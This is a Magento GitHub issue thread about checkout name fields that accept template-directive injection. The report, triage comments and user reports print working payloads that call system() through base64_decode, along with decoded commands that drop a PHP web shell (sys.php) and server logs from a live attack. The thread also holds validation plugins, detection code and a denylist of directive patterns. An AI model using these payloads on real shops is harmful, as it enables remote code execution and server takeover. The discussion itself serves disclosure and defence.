
Checkout address forms allow random code in the name fields #39002


Open
1 of 5 tasks
nkarthickannan opened this issue Aug 3, 2024 · 103 comments · May be fixed by #39038 or #39131
Labels
  • Area: Cart & Checkout
  • Component: Checkout
  • Issue: Confirmed (Gate 3 Passed. Manual verification of the issue completed. Issue is confirmed)
  • Priority: P2 (A defect with this priority could have functionality issues which are not to expectations.)
  • Progress: PR in progress
  • Reported on 2.4.7-p1 (Indicates original Magento version for the Issue report.)
  • Reproduced on 2.4.x (The issue has been reproduced on latest 2.4-develop branch)
  • Severity: S1 (Affects critical data or functionality and forces users to employ a workaround.)

Comments

@nkarthickannan

Preconditions and environment

Magento version - 2.4.7-p1

Steps to reproduce

  1. Install a fresh Magento latest version with sample data
  2. Add a product to the shopping cart and navigate to the checkout page (either as guest or as logged in user)
  3. Provide the following code in the First name and Last name fields (shipping and billing address fields)
    {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}

Expected result

Magento should not allow the user to proceed and should throw an error

Actual result

Magento allows the user to proceed further without throwing an error

Additional information

Similar issue is already raised and resolved here - #38331

Release note

No response

Triage and priority

  • Severity: S0 - Affects critical data or functionality and leaves users without workaround.
  • Severity: S1 - Affects critical data or functionality and forces users to employ a workaround.
  • Severity: S2 - Affects non-critical data or functionality and forces users to employ a workaround.
  • Severity: S3 - Affects non-critical data or functionality and does not force users to employ a workaround.
  • Severity: S4 - Affects aesthetics, professional look and feel, “quality” or “usability”.

m2-assistant bot commented Aug 3, 2024

Hi @nkarthickannan. Thank you for your report.
To speed up processing of this issue, make sure that the issue is reproducible on a vanilla Magento instance following the Steps to reproduce. To deploy a vanilla Magento instance on our environment, add a comment to the issue:


Join Magento Community Engineering Slack and ask your questions in #github channel.
⚠️ According to the Magento Contribution requirements, all issues must go through the Community Contributions Triage process. Community Contributions Triage is a public meeting.
🕙 You can find the schedule on the Magento Community Calendar page.
📞 The triage of issues happens in the queue order. If you want to speed up the delivery of your contribution, join the Community Contributions Triage session to discuss the appropriate ticket.

@nkarthickannan
Author

@magento give me 2.4-develop instance


Hi @nkarthickannan. Thank you for your request. I'm working on a Magento instance for you.


@nkarthickannan
Author

Issue confirmed in the default Magento provided above. Screenshots are attached here:

Screenshot 2024-08-03 at 9 43 08 AM

Screenshot 2024-08-03 at 9 41 19 AM

@jsdupuis

jsdupuis commented Aug 4, 2024

I have the same issue with Magento CE 2.4.5-p8. Had 2 code injection attacks using the first name and last name fields. No validation on the checkout page.

@engcom-Bravo engcom-Bravo added the Reported on 2.4.7-p1 Indicates original Magento version for the Issue report. label Aug 5, 2024
@engcom-Bravo engcom-Bravo self-assigned this Aug 5, 2024

m2-assistant bot commented Aug 5, 2024

Hi @engcom-Bravo. Thank you for working on this issue.
In order to make sure that the issue has enough information and is ready for development, please read and check the following instructions: 👇

  • 1. Verify that issue has all the required information. (Preconditions, Steps to reproduce, Expected result, Actual result).
  • 2. Verify that issue has a meaningful description and provides enough information to reproduce the issue.
  • 3. Add Area: XXXXX label to the ticket, indicating the functional areas it may be related to.
  • 4. Verify that the issue is reproducible on 2.4-develop branch
    Details- Add the comment @magento give me 2.4-develop instance to deploy test instance on Magento infrastructure.
    - If the issue is reproducible on 2.4-develop branch, please, add the label Reproduced on 2.4.x.
    - If the issue is not reproducible, add your comment that issue is not reproducible and close the issue and stop verification process here!
  • 5. Add label Issue: Confirmed once verification is complete.
  • 6. Make sure that automatic system confirms that report has been added to the backlog.

@n2diving-dgx

n2diving-dgx commented Aug 5, 2024

Similar code injection into the customer name field of a bogus guest checkout order received on a production Magento CE 2.4.6-p6 website.

@sunit9

sunit9 commented Aug 5, 2024

I am also getting the same issue. Someone is trying to add a file using base64 encoding. When I decode it I get the following:

cd pub;echo '<?php if($_POST['p']=="Sd44Ak8H") $_POST['f'](base64_decode($_POST['c']));' > sys.php

Magento version is CE 2.4.5-p1

If anyone has a solution then please provide it.

@in-session
Contributor

in-session commented Aug 5, 2024

There seems to be a major attempt at code injection at the moment. We were also able to reproduce the same behaviour in several instances. In my evaluation, this only refers to the guest checkout. This was observed in the production system from 3 August.

{{var this.getTemp%00lateFilter().add%00AfterFilterCallback(base64_decode).add%00AfterFilterCallback(system).Filter(Y2QgcHViO2VjaG8gJzw/cGhwIGlmKCRfUE9TVFsncCddPT0iOUdtdFhRbWsiKSAkX1BPU1RbJ2YnXShiYXNlNjRfZGVjb2RlKCRfUE9TVFsnYyddKSk7JyA+IHN5cy5waHA=)}}
cd pub;echo '<?php if($_POST['p']=="9GmtXQmk") $_POST['f'](base64_decode($_POST['c']));' > sys.php

Server error log:

2024/08/03 16:14:23 [error] 163093#163093: *6061362 access forbidden by rule, client: 127.0.0.1, server: _, request: "GET /sys.php HTTP/1.1", host: ***
2024/08/03 16:14:24 [error] 163093#163093: *6062169 access forbidden by rule, client: 127.0.0.1, server: _, request: "GET /pub/sys.php HTTP/1.1", host: ***

It seems that this was attempted using the REST API and the checkout page:

***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:13:57 +0200] "POST /rest//V1/guest-carts HTTP/1.1" 200 45 "-" "Mozilla/5.0 (Linux; Android 11; moto g(10)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:13:58 +0200] "GET /rest//V1/products?searchCriteria[pageSize]=20 HTTP/1.1" 401 6209 "-" "Mozilla/5.0 (Linux; Android 10; Redmi Note 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:13:58 +0200] "GET /catalogsearch/result/?q=%25a%25 HTTP/1.1" 302 5 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/search/%25a%25 HTTP/1.1" 200 704544 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/page_cache/block/esi/blocks/%5B%22topmenu_generic%22%5D/handles/WyJkZWZhdWx0IiwiY2F0YWxvZ3NlYXJjaF9yZXN1bHRfaW5kZXgiLCJjYXRhbG9nc2VhcmNoX3Jlc3VsdF9pbmRleF9ub3Jlc3VsdHMiXQ%3D%3D/ HTTP/1.1" 200 7647 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:00 +0200] "GET /de/page_cache/block/esi/blocks/%5B%22container-footer%22%5D/handles/WyJkZWZhdWx0IiwiY2F0YWxvZ3NlYXJjaF9yZXN1bHRfaW5kZXgiLCJjYXRhbG9nc2VhcmNoX3Jlc3VsdF9pbmRleF9ub3Jlc3VsdHMiXQ%3D%3D/ HTTP/1.1" 200 6341 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:09 +0200] "GET /*** HTTP/1.1" 200 100705 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.116 Mobile DuckDuckGo/5 Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:11 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/items HTTP/1.1" 200 169 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.160 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:11 +0200] "GET /rest//V1/directory/countries HTTP/1.1" 200 4050 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/default/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/en/V1/directory/countries HTTP/1.1" 200 4008 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:12 +0200] "GET /rest/english/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:13 +0200] "GET /rest/it/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:13 +0200] "GET /rest/italian/V1/directory/countries HTTP/1.1" 400 76 "-" "Mozilla/5.0 (iPad; CPU OS 15_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:14 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 12; V2023) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Mobile Safari/537.36"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:14 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 13; SM-G991W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:15 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/115.0.5790.84 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:15 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 13; SAMSUNG SM-S911B) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/23.0 Chrome/115.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:16 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 12 "-" "Mozilla/5.0 (Linux; Android 11; 2201117TY) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:16 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/estimate-shipping-methods HTTP/1.1" 200 226 "-" "Mozilla/5.0 (Linux; Android 10; RMX1825) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.99 Mobile Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:17 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/shipping-information HTTP/1.1" 200 2277 "-" "Mozilla/5.0 (iPad; CPU OS 16_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/282.0.564912098 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:17 +0200] "GET /customer/account/create/ HTTP/1.1" 200 480398 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:19 +0200] "GET /checkout HTTP/1.1" 302 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:19 +0200] "GET /de/checkout/cart/ HTTP/1.1" 200 471470 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/104.0.5112.88 Mobile/15E148 Safari/604.1"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:22 +0200] "POST /rest//V1/guest-carts/BX2VUJt5UYMHOD2RB7dbQxwRNdaqKldF/payment-information HTTP/1.1" 200 14 "-" "Mozilla/5.0 (Linux; Android 5.1.1; KFSUWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/108.9.6 like Chrome/108.0.5359.220 Safari/537.36"
***, 127.0.0.1 - 127.0.0.1 - - [03/Aug/2024:16:14:23 +0200] "GET /sys.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPad; CPU OS 15_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/250.0.505561494 Mobile/15E148 Safari/604.1"
***, ::1 - 127.0.0.1 - - [03/Aug/2024:16:14:24 +0200] "GET /pub/sys.php HTTP/1.1" 404 347 "-" "Mozilla/5.0 (iPhone; CPU OS 17_0_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) 1Password/7.10.2 (like Version/17.0.3 Mobile/21A360 Safari/600.1.4)"

The system should fix the problem with CVE-2022-24086, but the orders are still coming in and a validation should be carried out beforehand. There already seems to be a merged pull request here, but it is not yet included in the core:
#38345
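Added example, not in-session's code and not part of Magento: a PHP script that applies the correlation visible in the logs above to constructed access-log lines. It flags a client that completes a REST guest checkout (POST to .../payment-information) and, within a short window, requests a PHP file at the web root or under /pub/ that is not one of Magento's entry points. A 404 on that probe means the drop failed, as in the excerpt above; a 200 would mean the file exists and the host should be treated as compromised. The log lines, client addresses, cart ids, window length and entry-point list are all assumptions.

```php
<?php
declare(strict_types=1);

// Constructed sample lines in the shape of the excerpt above; the client addresses,
// cart ids and user agents are placeholders, not data from any real server.
const SAMPLE_LOG = <<<'LOG'
203.0.113.10 - - [03/Aug/2024:16:13:57 +0200] "POST /rest//V1/guest-carts HTTP/1.1" 200 45 "-" "UA"
203.0.113.10 - - [03/Aug/2024:16:14:17 +0200] "POST /rest//V1/guest-carts/CARTID/shipping-information HTTP/1.1" 200 2277 "-" "UA"
203.0.113.10 - - [03/Aug/2024:16:14:22 +0200] "POST /rest//V1/guest-carts/CARTID/payment-information HTTP/1.1" 200 14 "-" "UA"
203.0.113.10 - - [03/Aug/2024:16:14:23 +0200] "GET /sys.php HTTP/1.1" 404 347 "-" "UA"
203.0.113.10 - - [03/Aug/2024:16:14:24 +0200] "GET /pub/sys.php HTTP/1.1" 404 347 "-" "UA"
198.51.100.7 - - [03/Aug/2024:16:20:01 +0200] "POST /rest//V1/guest-carts/OTHERCART/payment-information HTTP/1.1" 200 14 "-" "UA"
198.51.100.7 - - [03/Aug/2024:16:20:05 +0200] "GET /checkout/onepage/success/ HTTP/1.1" 200 48000 "-" "UA"
LOG;

// PHP files that legitimately sit in Magento's web root (assumed list; extend it for your deployment).
const KNOWN_ENTRY_POINTS = ['/index.php', '/get.php', '/static.php', '/health_check.php', '/cron.php'];

/** Parse one combined-format line into client, unix time, method, path and status. */
function parseLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) /';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $ts = DateTimeImmutable::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($ts === false) {
        return null;
    }
    return ['client' => $m[1], 'time' => $ts->getTimestamp(), 'method' => $m[3],
            'path' => $m[4], 'status' => (int) $m[5]];
}

/** True for GET /x.php or GET /pub/x.php where x.php is not a known entry point. */
function isUnexpectedPhpRequest(array $e): bool
{
    if ($e['method'] !== 'GET' || !preg_match('#^(/pub)?(/[^/?]+\.php)(\?.*)?$#', $e['path'], $m)) {
        return false;
    }
    return !in_array($m[2], KNOWN_ENTRY_POINTS, true);
}

/** Return every unexpected PHP request a client made within $window seconds of its last REST checkout. */
function findCheckoutThenProbe(string $log, int $window = 60): array
{
    $lastCheckout = []; // client => time of its last payment-information POST
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $e = parseLogLine($line);
        if ($e === null) {
            continue;
        }
        if ($e['method'] === 'POST' && str_ends_with($e['path'], '/payment-information')) {
            $lastCheckout[$e['client']] = $e['time'];
            continue;
        }
        if (isUnexpectedPhpRequest($e) && isset($lastCheckout[$e['client']])
            && $e['time'] - $lastCheckout[$e['client']] <= $window) {
            $hits[] = $e + ['after_checkout' => $e['time'] - $lastCheckout[$e['client']]];
        }
    }
    return $hits;
}

foreach (findCheckoutThenProbe(SAMPLE_LOG) as $hit) {
    $verdict = $hit['status'] === 200 ? 'file served, treat host as compromised' : 'probe only, drop failed';
    printf("%s GET %s %ds after checkout (HTTP %d): %s\n",
        $hit['client'], $hit['path'], $hit['after_checkout'], $hit['status'], $verdict);
}
```

Only the first client is reported (two probes, both 404); the second client goes from checkout to the normal success page and produces no hit. Behind a reverse proxy use the forwarded client field your log actually records, since the excerpt above shows 127.0.0.1 as the immediate peer.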

@engcom-Bravo
Contributor

@magento give me 2.4-develop instance


Hi @engcom-Bravo. Thank you for your request. I'm working on a Magento instance for you.


@engcom-Bravo
Contributor

Hi @nkarthickannan,

Thanks for your reporting and collaboration.

We have verified the issue in the latest 2.4-develop instance and the issue is reproducible. Kindly refer to the screenshots.

Steps to reproduce

  • Install a fresh Magento latest version with sample data
  • Add a product to the shopping cart and navigate to the checkout page (either as guest or as logged in user)
  • Provide the following code in the First name and Last name fields (shipping and billing address fields)
  • {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}} {{var this.getTemplateFilter().filter(dummy) }}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(system).filter(ZWNobyAnPD9waHAgJHY9KCRfR0VUWyJhIl0pO0BzeXN0ZW0oJHYpOycgPmFwaXMucGhw)}}
Screenshot 2024-08-05 at 15 55 18

It allows the first and last name with the random code without throwing any error.

Hence confirming the issue.

Thanks.

@engcom-Bravo engcom-Bravo added Component: Checkout Issue: Confirmed Gate 3 Passed. Manual verification of the issue completed. Issue is confirmed Reproduced on 2.4.x The issue has been reproduced on latest 2.4-develop branch Priority: P2 A defect with this priority could have functionality issues which are not to expectations. Area: Cart & Checkout labels Aug 5, 2024
@github-jira-sync-bot

✅ Jira issue https://jira.corp.adobe.com/browse/AC-12687 is successfully created for this GitHub issue.


m2-assistant bot commented Aug 5, 2024

✅ Confirmed by @engcom-Bravo. Thank you for verifying the issue.
Issue Available: @engcom-Bravo, you will be automatically unassigned. Contributors/Maintainers can claim this issue to continue. To reclaim and continue work, reassign the ticket to yourself.

@Max-Leps

@bafmaamy

@Max-Leps you can update the code of app/code/{Vendor}/{Your Module}/Plugin/OrderSourceLogger.php with:

<?php
namespace {Vendor}\{Your Module}\Plugin;

use Magento\Sales\Api\OrderRepositoryInterface;
use Psr\Log\LoggerInterface;
use Magento\Framework\Exception\InputException;

class OrderSourceLogger
{
    protected $logger;

    public function __construct(LoggerInterface $logger)
    {
        $this->logger = $logger;
    }

    private function getClientIp()
    {
        if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
            return $_SERVER['HTTP_CLIENT_IP'];
        } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
            return $_SERVER['HTTP_X_FORWARDED_FOR'];
        } elseif (!empty($_SERVER['HTTP_X_REAL_IP'])) {
            return $_SERVER['HTTP_X_REAL_IP'];
        } else {
            return $_SERVER['REMOTE_ADDR'];
        }
    }

    private function validateInput($input, $fieldName, $maxLength = null)
    {
        // Check if input is null or empty, skip validation if it is
        if (empty($input)) {
            return;
        }

        // Check for disallowed characters
        if (preg_match('/[{}<>%]/', $input)) {
            throw new InputException(__("Invalid characters in $fieldName."));
        }

        // Length validation if maxLength is provided
        if ($maxLength !== null && strlen($input) > $maxLength) {
            throw new InputException(__("$fieldName cannot exceed $maxLength characters."));
        }
    }

    public function beforeSave(OrderRepositoryInterface $subject, $order)
    {
        $isApiOrder = false;

        // Check if the order is placed via API by inspecting the current request
        if (php_sapi_name() !== 'cli' && isset($_SERVER['HTTP_USER_AGENT'])) {
            $userAgent = $_SERVER['HTTP_USER_AGENT'];
            if (strpos($userAgent, 'REST') !== false || strpos($userAgent, 'API') !== false) {
                $isApiOrder = true;
            }
        }

        try {
            // Validate firstname and lastname with length limit
            $this->validateInput($order->getCustomerFirstname(), 'First Name', 30);
            $this->validateInput($order->getCustomerLastname(), 'Last Name', 30);

            // Validate company and other address fields for disallowed characters
            $billingAddress = $order->getBillingAddress();
            $shippingAddress = $order->getShippingAddress();

            if ($billingAddress) {
                $this->validateInput($billingAddress->getCompany(), 'Billing Company');
                $this->validateInput($billingAddress->getCity(), 'Billing City');
                $this->validateInput($billingAddress->getPostcode(), 'Billing Postcode');
                $this->validateInput($billingAddress->getStreetLine(1), 'Billing Street Address');
            }

            if ($shippingAddress) {
                $this->validateInput($shippingAddress->getCompany(), 'Shipping Company');
                $this->validateInput($shippingAddress->getCity(), 'Shipping City');
                $this->validateInput($shippingAddress->getPostcode(), 'Shipping Postcode');
                $this->validateInput($shippingAddress->getStreetLine(1), 'Shipping Street Address');
            }
            
            // Assuming there is a field for order comments
            if ($order->getCustomerNote()) {
                $this->validateInput($order->getCustomerNote(), 'Order Comments');
            }

            // Log the source of the order and additional request details
            $orderSource = $isApiOrder ? 'API' : 'Web';
            $this->logger->info('Order placed via ' . $orderSource . ': Order ID ' . $order->getEntityId());

            $this->logger->info('Order Details', [
                'IP' => $this->getClientIp(),
                'User Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown User Agent',
                'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown URI',
            ]);
        } catch (InputException $e) {
            // Log the unsuccessful attempt
            $this->logger->warning('Unsuccessful order attempt: ' . $e->getMessage(), [
                'IP' => $this->getClientIp(),
                'User Agent' => $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown User Agent',
                'Request URI' => $_SERVER['REQUEST_URI'] ?? 'Unknown URI',
            ]);

            // Rethrow the exception to stop the order from being saved
            throw $e;
        }
    }
}

Added validation of shipping address, billing address, post code, city and order comments, and disallowed more than 30 characters in firstname and lastname too.

Hello

Thank you so much for your effort, I really appreciate it!
You seem to be very talented in Magento and coding. I'm impressed.

But you have missed some fields.
I think if we leave some fields unrestricted they can still inject the code.

Actually can you filter all these fields:

first name
last name
email
company
street address line 1
street address line 2
country
state
city
postcode
phone number
order comments (if it's there)

And can you do it for all possible inputs like:

Shipping address
Billing address
Customer registration

After that we will all be 99.99% protected
Right?

Cheers
Max
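Added example, not bafmaamy's plugin code and not part of Magento: standalone PHP validation functions of the kind validateInput() in the plugin above could delegate to. The plugin's denylist /[{}<>%]/ does stop the payloads posted in this thread, but it is only applied to the order's customer name, the first street line and a few address fields, so this example also walks every street line and the address's own first and last name. It normalises input first (control bytes such as the NUL that the %00 variant inserts are stripped and one layer of percent-encoding is decoded) so a directive cannot be hidden from the check, uses an allowlist for person-name fields and a template-directive denylist for free-text fields. The field names, length limits and sample inputs are assumptions.

```php
<?php
declare(strict_types=1);

// Magento template directives are delimited by "{{" and "}}"; no legitimate address
// value contains those, so the delimiters themselves are rejected.
const TEMPLATE_DIRECTIVE = '/\{\{|\}\}/';

/** Strip C0/DEL control bytes (including NUL) and decode one layer of percent-encoding. */
function normalizeField(string $value): string
{
    $clean = preg_replace('/[\x00-\x1F\x7F]/', '', $value);
    return rawurldecode($clean);
}

/** Person-name fields: allowlist of letters, combining marks, space, apostrophe, period, hyphen. */
function checkName(string $value, int $maxLength = 30): ?string
{
    $v = normalizeField($value);
    if ($v !== $value) {
        return 'contains control bytes or percent-encoding';
    }
    if ($v === '') {
        return 'is required';
    }
    if (preg_match('/^[\p{L}\p{M} \'.-]+$/u', $v) !== 1) {
        return 'contains disallowed characters';
    }
    return mb_strlen($v) > $maxLength ? "exceeds $maxLength characters" : null;
}

/** Free-text fields (company, street, city, postcode, region, phone, comments): denylist. */
function checkFreeText(string $value, int $maxLength = 255): ?string
{
    $v = normalizeField($value);
    if (mb_strlen($v) > $maxLength) {
        return "exceeds $maxLength characters";
    }
    return preg_match(TEMPLATE_DIRECTIVE, $v) === 1 ? 'contains a template directive' : null;
}

/** Validate an address given as a plain array; keys mirror Magento's address attribute codes (assumed). */
function validateAddress(array $a): array
{
    $errors = [];
    foreach (['firstname', 'lastname'] as $f) {
        if (($e = checkName((string) ($a[$f] ?? ''))) !== null) {
            $errors[$f] = $e;
        }
    }
    // Every street line, not only the first one.
    foreach ((array) ($a['street'] ?? []) as $i => $line) {
        if (($e = checkFreeText((string) $line)) !== null) {
            $errors["street[$i]"] = $e;
        }
    }
    foreach (['company', 'city', 'postcode', 'region', 'telephone'] as $f) {
        if (isset($a[$f]) && ($e = checkFreeText((string) $a[$f], 100)) !== null) {
            $errors[$f] = $e;
        }
    }
    return $errors;
}

// Constructed inputs: one legitimate address and one carrying the directive shapes seen in this
// thread (plain, with a NUL byte inside the method name as in the %00 variant, and percent-encoded).
$addresses = [
    'legit'    => ['firstname' => "O'Brien", 'lastname' => 'María-José',
                   'street' => ['221B Baker St.', 'c/o Smith & Co, Unit 5'],
                   'city' => 'London', 'postcode' => 'NW1 6XE', 'region' => 'Greater London',
                   'telephone' => '+44 20 7946 0000'],
    'injected' => ['firstname' => '{{var this.getTemplateFilter().filter(dummy) }}',
                   'lastname' => "{{var this.getTemp\0lateFilter()}}",
                   'street' => ['1 Main St', '%7B%7Bvar dummy%7D%7D'], 'region' => '{{var x}}'],
];
foreach ($addresses as $label => $address) {
    $errors = validateAddress($address);
    echo "$label: ", $errors ? 'REJECT' : 'ok', "\n";
    foreach ($errors as $field => $message) {
        echo "  $field $message\n";
    }
}
```

The name allowlist is deliberately strict; widen the character class for the locales you serve rather than loosening the free-text check, and keep the normalisation step in front of both, since a check that sees the raw bytes is the one the NUL and percent-encoded variants are aimed at.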

@bafmaamy

bafmaamy commented Aug 18, 2024

@ssx @RotzGott @Max-Leps Yeah, it's a great idea for everything to be validated.

Just finished the module. Now every field is protected.

https://github.com/bafmaamy/Magento-FieldValidator

Tested on 2.4.6

@in-session I really want to help with this, but I don't have enough skills to touch the core of Magento. Now the module validates the fields of Order Creation, Customer Creation, Customer Name Update and Customer Address Update, and saves every unsuccessful attempt. Hope this can help.

@ganeddact

If the problem with firstname and lastname gets solved sooner or later, how is it possible to place an order bypassing the payment altogether like attackers are doing? I don't think it's related to the firstname and lastname content. Orders look legit apart from those values, and some people may fall for it and fulfil them without checking if a payment has gone through.

@ssx
Contributor

ssx commented Aug 19, 2024

If the problem with firstname and lastname gets solved sooner or later, how is it possible to place an order bypassing the payment altogether like attackers are doing? I don't think it's related to the firstname and lastname content. Orders look legit apart from those values, and some people may fall for it and fulfil them without checking if a payment has gone through.

Some payments are completed in two steps, usually when a payment gateway is set to redirect mode. In these situations, the order is placed into Pending Payment, they go off to complete payment and the order is updated once they return.

@engcom-Hotel engcom-Hotel moved this to Pull Request In Progress in High Priority Backlog Aug 19, 2024
@jonaschen623

jonaschen623 commented Aug 20, 2024

Just an update, today when I try to place an order with name/address fields
